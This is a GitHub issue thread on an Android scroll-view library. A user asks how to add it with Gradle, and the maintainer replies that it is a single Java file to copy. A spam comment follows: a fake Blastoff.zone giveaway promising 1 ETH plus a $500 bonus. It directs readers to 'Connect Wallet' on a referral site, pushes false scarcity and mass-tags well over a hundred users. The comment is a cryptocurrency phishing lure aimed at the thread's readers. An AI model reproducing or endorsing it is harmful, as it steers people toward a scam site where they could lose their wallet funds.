### ISSUE TITLE
how to add the gradle to my prjects

### ISSUE THREAD

**Issue by sharathyadhav1** [klaszlo8207/StretchTopViewExample#2]

**Comment by klaszlo8207** [comment]
It is only a one file library:

https://github.com/klaszlo8207/StretchTopViewExample/blob/master/stretchTopViewLibrary/src/main/java/hu/lacroix82/stretchtopviewlibrary/StretchTopScrollView.java

copy and paste it

**Comment by risangpinto** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
lero003, @ray-learn, @dade80vr, @Saka7, @chevronkey, @brobrojrod, @stevewaffles, @ninacat25, @jerryDrumm, @Techchild7, @Schoss, @dnev1551, @kevinnguyenai, @bcrigler, @adotsloan, @ljluestc, @paradoxicalNL, @jirkaformanek, @hemantasapkota, @kerrtravers, @be1box, @wyrover, @FormusohDinga, @tonyrevo, @thiagoghisicrypto, @leventozen, @cucuso, @o3LL, @nimbosa, @justHungryMan, @Winglonelion, @mydxnh, @Andrey543543, @mortezabahmani, @ellen-du, @YazaiHu, @noshitsecurity, @flmuel, @peterpme, @freshduer, @kidbomb, @mjvignesh, @kflwasjkl, @carsrlife, @diveyez, @godratio, @gummideepak, @IgorKonovalov, @orhanbalci174, @jinyahuanraj-indulkar, @ali-raheem, @supportlivecoin, @firhatnawfanh, @g0dspeak, @cdrrazan, @chrislonge, @quantmod, @pybizzle, @Almolhem, @nicolas-martin, @BeholdAdam, @Max-Meldrum, @deaconudanandrei, @0xdevalias, @fayazg, @ariellephan, @Kurre, @soSeriousSec, @hiroki1117, @fantuz, @mstarnes, @pcondreicsik, @fanhuaqiang, @oleersoy, @blancosj, @drmzio, @xvgPedro, @xMoad, @yamshik1, @ecorvo, @black23, @farbodataie, @sheldon111, @tripstylin, @ornedaj, @astronaut1712, @kael4n, @medenfield, @Jackneill, @EMCarrasco, @kamal-ganwani, @favazmohd, @ktomov, @eshbeata, @alighazi, @thiagoghisi, @Feargalicious, @ozanh, @Carloskorraneeddylackmann, @gokdayi, @crueber, @mlamias, @iminecrypto, @lordxerxex, @pinguluk, @duuncan, @GQM, @Imran31, @edsonbatista, @jmagdika, @klichukb, @raonyguimaraes, @shotajm, @adammccnn, @JayceLau76, @kevinxh, @sharifulb, @mehrdad-shokri, @gilescope, @nisavid, @msekeris, @initial, @BruceMikey, @agucova, @0x7c13, @ilanus, @Lildan, @xadidas4lifex, @mutalisk999, @michaelonubogu, @DanLaufer, @tampham47, @indieklem, @snackycracky, @haghighi, @tamaslocher, @bebezet, @IlimaVIP, @byBORA, @elnegrogato, @y-matsuwitter, @autosmile, @cmalumph, @maldiohead, @dzfweb, @isaacsant, @Huge, @ImportRandomSeed
